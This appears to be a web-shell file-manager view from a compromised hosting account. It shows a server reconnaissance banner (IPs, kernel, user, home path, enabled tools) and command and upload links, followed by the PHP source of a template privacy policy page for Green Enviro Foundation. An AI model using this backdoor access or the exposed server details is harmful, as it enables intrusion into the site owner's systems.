Server IP : 103.53.40.154 / Your IP : 3.12.123.41 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/greenenvirofoundation.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <?php include'top-links.php'?> <title>Privacy Policy </title> <style> #privacy h3, #privacy h4 { color: #4baf47; } #privacy h3 { border-bottom: 2px solid #4baf47; padding-bottom: 10px; } #privacy h4 { margin-top: 20px; border-bottom: 1px solid #ddd; padding-bottom: 5px; } #privacy p { margin: 15px 0; } #privacy ul { margin: 10px 0; padding-left: 20px; } #privacy li { margin-bottom: 10px; } #privacy a { color: #4baf47; text-decoration: none; } #privacy a:hover { text-decoration: underline; } #privacy address { margin: 20px 0; font-style: normal; } </style> </head> <body> <?php include 'header.php'?> <main> <section class="page-banner bg-image pt-130 pb-130"> <div class="container"> <h4 class="wow fadeInUp" data-wow-duration="1.2s" data-wow-delay=".2s">Privacy Policy </h4> <div class="breadcrumb-list wow fadeInUp" data-wow-duration="1.4s" data-wow-delay=".4s"> <a href="index.html">Home :</a> <span class="primary-color">Privacy Policy </span> </div> </div> </section> <section id="privacy"> <div class="container"> <div class="row"> <h3>Privacy Policy for Green Enviro Foundation</h3> <p><strong>Effective Date:</strong> [Insert Date]</p> <h4>1. Introduction</h4> <p>Welcome to Green Enviro Foundation ("we," "our," "us"). We are committed to protecting your privacy and ensuring the security of your personal data. This Privacy Policy explains how we collect, use, disclose, and safeguard your information when you visit our website [insert website URL] and interact with our services related to the Safety Award 2025, CSR Award 2025, and EHS Award 2025.</p> <h4>2. Information We Collect</h4> <p>We may collect and process the following types of information:</p> <ul> <li><strong>Personal Identification Information:</strong> This includes your name, email address, phone number, and any other information you provide when submitting applications or inquiries related to our awards.</li> <li><strong>Usage Data:</strong> Information about how you use our website and services, including IP address, browser type, and operating system.</li> <li><strong>Cookies and Tracking Technologies:</strong> We use cookies and similar technologies to enhance your experience and analyze website usage. You can manage your cookie preferences through your browser settings.</li> </ul> <h4>3. How We Use Your Information</h4> <p>We use your information for the following purposes:</p> <ul> <li><strong>To Process Applications:</strong> To review and process applications for the Safety Award 2025, CSR Award 2025, and EHS Award 2025.</li> <li><strong>To Communicate with You:</strong> To respond to inquiries, send updates, and provide information related to our awards and activities.</li> <li><strong>To Improve Our Services:</strong> To analyze usage patterns and improve our website and services.</li> <li><strong>To Comply with Legal Obligations:</strong> To adhere to legal and regulatory requirements.</li> </ul> <h4>4. How We Share Your Information</h4> <p>We may share your information in the following circumstances:</p> <ul> <li><strong>With Service Providers:</strong> We may share information with third-party service providers who assist us in operating our website, processing applications, and conducting analyses. These providers are obligated to protect your information and use it only for the purposes for which it was shared.</li> <li><strong>For Legal Reasons:</strong> We may disclose your information if required by law or to respond to legal processes or enforceable governmental requests.</li> <li><strong>With Your Consent:</strong> We may share information with your consent or as otherwise disclosed at the time of collection.</li> </ul> <h4>5. Data Security</h4> <p>We implement appropriate technical and organizational measures to protect your information against unauthorized access, alteration, disclosure, or destruction. However, no method of transmission over the internet or electronic storage is completely secure, so we cannot guarantee absolute security.</p> <h4>6. Your Rights</h4> <p>Depending on your jurisdiction, you may have the following rights regarding your personal data:</p> <ul> <li><strong>Access:</strong> You can request access to the personal information we hold about you.</li> <li><strong>Correction:</strong> You can request that we correct any inaccurate or incomplete information.</li> <li><strong>Deletion:</strong> You can request that we delete your personal data, subject to legal and contractual obligations.</li> <li><strong>Objection:</strong> You can object to the processing of your data under certain circumstances.</li> <li><strong>Data Portability:</strong> You can request a copy of your data in a structured, commonly used format.</li> </ul> <p>To exercise any of these rights, please contact us using the information provided below.</p> <h4>7. Changes to This Privacy Policy</h4> <p>We may update this Privacy Policy from time to time. Any changes will be posted on our website with an updated effective date. We encourage you to review this policy periodically to stay informed about how we are protecting your information.</p> <h4>8. Contact Us</h4> <p>If you have any questions or concerns about this Privacy Policy or our data practices, please contact us at:</p> <address> <strong>Green Enviro Foundation</strong><br> [Insert Address]<br> [Insert City, State, ZIP Code]<br> Email: <a href="mailto:[insert email address]">[insert email address]</a><br> Phone: [insert phone number] </address> </div> </div> </section> </main> <?php include 'footer.php'?> </body> </html>